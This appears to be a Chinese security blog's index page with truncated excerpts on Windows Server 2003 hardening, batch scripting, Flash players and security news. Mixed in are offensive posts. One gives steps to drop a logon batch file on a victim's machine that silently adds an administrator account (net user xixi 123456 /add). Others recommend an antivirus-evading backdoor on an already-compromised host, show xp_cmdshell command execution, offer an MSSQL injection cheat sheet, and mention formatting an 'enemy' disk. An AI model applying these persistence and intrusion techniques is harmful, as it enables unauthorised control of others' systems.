溢出我心

WindowsServer2003 + IIS6.0 + ASP + NET + PHP + PERL + MSSQL + MYSQL 最新服务器安全设置技术实例

1、服务器安全设置之--硬盘权限篇

这里着重谈需要的权限，也就是最终文件夹或硬盘需要的权限，可以防御各种木马入侵，提权攻击，跨站攻击等。本实例经过多次试验，安全性能很好，服务器基本没有被木马威胁的担忧了。

硬盘或文件夹: C:\ D:\ E:\ F:\ 类推
主要权限部分： 其他权限部分：
Administrators 完全控制 无
如果安装了其他运行环境，比如PHP等，则根据PHP的环境功能要求来设置硬盘权限，一般是安装目录加上...

记录一下，不然以后找不到。

mstsc /console /v:IP:终端端口

硬盘或文件夹: C:\Inetpub\wwwroot\aspnet_client

主要权限部分：
其他权限部分：
Administrators
完全控制
Users
读取

该文件夹，子文件夹及文件

该文件夹，子文件夹及文件


SYSTEM
完全控制


该文件夹，子文件夹及文件

硬盘或文件夹: C:\Documents and Settings

主要权限部分：
其他权限部分：
Administrators
完全控制

无

该文件夹，子文件夹及文件

SYSTE...

操作步骤：
1、在自己电脑里面建立一个.txt文本文件.
2、在里面输入内容
@echo off
net user xixi 123456 /add 注释：前面xixi是用户名后面123456是密码；
net localgroup administrators xixi /add

3、把这个文件保存，更改后缀为xixi.bat 注释：前面名字随便，后面格式一定要是bat；
4、把这个文件拷贝到对方电脑C:\WINNT\system32\GroupPolicy\User\Scripts\Logon文件目录下，没有的话自己创建。
完成，下次对方电脑无论如何都有这个管理员帐号，删除了，下次启动还有！
如果把里面的内容改成
@echo off
net user ad...

Windows 2003版本区别

1）Windows Server 2003, Standard Edition （标准版）

针对中小型企业的核心产品，他也是支持双路处理器，4GB的内存。它除了具备 Windows Server 2003 Web Edition 所有功能外，还支持像证书服务、UDDI服务、传真服务、IAS因特网验证服务、可移动存储、RIS、智能卡、终端服务、WMS和 Services for Macintosh。

支持文件和打印机共享。 提供安全的网络联接。


2）Windows Server 2003, Enterprise Edition （企业版）

这个产品被定义为新一带高端产品，它最多能够支持8路处理器，32 GB内存，和28个节点的集群。它是 ...

echo.
echo ------------------------------------------------------
echo.
echo ...........
echo.
net share c$ /delete
net share d$ /delete
net share e$ /delete
net share f$ /delete
net share admin$ /delete
net share ipc$ /delete
net stop server
net stop lanmanworkstation


regsvr32/u C:\WINDOWS\System32\wshom.ocx
regs...

以下是我服务器的安全配置情况,写得没好,请没要介意.也没要拿砖头砸我

一.磁盘权限的设置

c:\
Administrators 完全控制
System 完全控制
Users 读取 读取运行 列出文件夹目录(为了让防盗链能正常运行)
Guest 拒绝所有权限.并只应用到“只有该文件夹”

C:\Documents and Settings
Administrators 完全控制
System 完全控制

C:\Documents and Settings\All Users
Administrators 完全控制
System 完全控制

C:\php
读取 读取运行...

@echo off
:: Ncfoever 1.0 bulid by ALLyeSNO 2005-06-13
:: 可用于tcp端口数据包的捕获
cls
::/* 参数判断以及使用说明 */
set count=1
if /i "%1"=="-look" goto nclook
if /i "%1"=="-log" goto nclog
echo.
echo =======================================================================
echo Ncforever 1.0 build by ALLyeSNO
echo...

在阅读本文之前，假设你已经成功入侵了某台Windows2000主机并取得了管理员帐号。大多数时候我们入侵某台主机的目的并不是为了直接破坏，可以在该主机上留下后门以便自己以后可以方便的“使用”该机。

目前一般情况下，入侵Windows2000后使用最多的后门是RemoteNc了，但该工具有一很大的缺点，容易被杀毒软件查出，而且如果用Fport或Active Ports等软件也可以看到它监听的端口，这很容易让管理员发现。

对于Windows2000下的后门推荐使用Windows2000 Resoruce Kit中自带的一个小工具Rcmdsvc.exe和Rcmd.exe，这是微软自己出的一个用来在命令行下远程管理主机的小工具。它有以下优点：
1、不会被杀毒软件认为是病毒或后门程序，毕竟这是微软自己出的东西。

在CK的blog上看到滴=.=  

作者貌似是isno~硬盘文。方法大家都会偶拖出来看思路滴。

最让人感兴趣的也许就是前面介绍的利用扩展存储过程xp_cmdshell来运行操作系统的控制台命令。这种方法也非常的简单，只需使用下面的SQL语句：

EXEC master.dbo.xp_cmdshell ‘dir c:\‘

但是越来越多的数据库管理员已经意识到这个扩展存储过程的潜在危险，他们可能会将该存储过程的动态链接库xplog70.dll文件删除或改了名，这时侯许多人也许会放弃，因为我们无法运行任何的cmd命令，很难查看对方计算机的文件、目录、开启的服务，也无法添加NT用户。

对此作过一番研究，后来我发现即使xp_cmdshell不可用了，还是有可能在服务器上运行CMD并得到回显结果的...

文章作者：剑心  

非常经典的Ms Sql注射资料
Sql注射总结（强烈推荐）

Sql注射总结（早源于'or'1'='1）

最重要的表名：
select * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses


最重要的一些用户名（默认sql数据库中存在着的）
public
dbo
guest(一般禁止，或者没权限)
db_sercurity...

接收键盘输入字符串的程序
:: Get user input - includes error check
@echo off
echo e102'set %%1='> %temp%.\t1.dat
for %%? in (w q) do echo %%?>> %temp%.\t1.dat
:input
echo.
echo Type input:
FC con nul /lb1 /n |FIND "1:" > %temp%.\t2.bat
:: Error checking begins here
FIND "|" %temp%.\t2.bat > nul
if not errorle...

一.简单批处理内部命令简介
1.Echo 命令
打开回显或关闭请求回显功能，或显示消息。如果没有任何参数，echo 命令将显示当前回显设置。
语法
echo [{on│off}] [message]
Sample：@echooff / echo hello world
在实际应用中我们会把这条命令和重定向符号（也称为管道符号，一般用> >> ^）结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。


2.@ 命令
表示不显示@后面的命令，在入侵过程中（例如使用批处理来格式化敌人的硬盘）自然不能让对方看到你使用的命令啦。
Sample：@echooff
@echo Now initializing the program...

9个基于flash的音乐播放器
转自:http://blog.chinahtml.com/node/112

通过在网页中嵌入Flash对象进行音乐播放是十分常用的，这其中的核心就是Flash播放器。这里，给大家推荐一些基于Flash的音乐播放器，希望能对同志们有所帮助。

1. Audio Player(官方地址)
名字很直接，就叫音频播放器，呵呵。

2. Single MP3 Player(官方地址)物如其名，简单明了。

3. Dew Player (官方地址)
很漂亮的东东，作者本人就是设计师。

4. Odeo (官方地址)
Odeo本身提供的就是Podcast的服务，这是它们的重要工具之一。另外，你可以不下载这个swf，...

 
Code:
@echo off&SETLOCAL ENABLEDELAYEDEXPANSION
title 批处理中判断用户的输入是否是一指定数值的方法,支持任何特殊字符的方法 by:vkill
findstr "^::要求输入为" "%~nx0" >"%temp%\b.txt" 2>nul ||(echo 你没有定义要求输入的数值&pause&exit/b)
:loop
cls
set v=&set/p=输入:<nul&set/p "v= "
echo.
if not defined v (echo 输入为空,不符合你的要求&goto ...

 
Code: @echo off
title IP地址地理位置^/手机号码归属地查询 by:vkill
::用的是ip138的数据库
::需要外部工具 curl & sed ,下载:[url]http://www.vkill.net/tools.html[/url]
:start_
cls&set v=&set a=
set/p=你输入你要查询的IP地址或手机号码:<nul & set/p "v="
if not defined v goto :start_
echo 正在查询,请稍候......
echo.
echo "%v%"|find ".">nul 2>...

[转]脚本是好玩的——让XP语音阅读你的文本文件
http://www.cn-dos.net/forum/viewthread.php?tid=24016

想听听电脑是怎样发音的吗？
保存下面一句话为 Say.vbs

CreateObject("SAPI.SpVoice").Speak CreateObject("Scripting.FileSystemObject").OpenTextFile(WScript.Arguments(0)).ReadAll

拖一个含有英文的文本文件(*.txt)到这个vbs图标上，你的Windows XP就会自动帮你读这个文件。

要结束阅读，请 Ctrl+Alt+Del 打开任务管理器结...

感谢beta10的投递

今天中午朋友打电话说网站打不开了，而统一服务器上的其他网站可以，详细询问了现象原来是无法解析域名，立即怀疑新网是不是又被黑了，上网上一看，果不其然。

先是在新网的www.paycenter.com.cn上看到一则公告，大意是说关于万网什么什么的事情的澄清。而这次主页被改时间之后，原来挂公告的地方，竟然出现了“无法找到该页”的提示，耐人寻味。

以下是事件详情：

新闻来源:majorgeeks.com
Returnil虚拟影子系统(Returnil Virtual System 2007)来自欧洲著名的安全公司Returnil SIA，它是一个基于虚拟机原理的新一代防毒防木马类软件，可以瞬间把您的计算机用隔离罩保护起来，同时用一个内存中的虚假替身——“影子”系统来接管真实的操作系统，任何病毒和木马都被限制在虚拟系统中使用，无法感染你真实的操作系统。重启后，所有危险即刻消失的无影无踪。

常见的杀毒软件几乎对于每个文件操作，每个网络访问，每个注册表操作，都要盘查过问，同时用多达几十万的病毒标本进行逐一比较，这样下来系统的资源大部分被杀毒软件占用了，常常让您的爱机变得其慢无比。Returnil虚拟影子系统最高时只占用1%不到的系统资源，而且在空闲时几乎不占用系统任何CPU资源...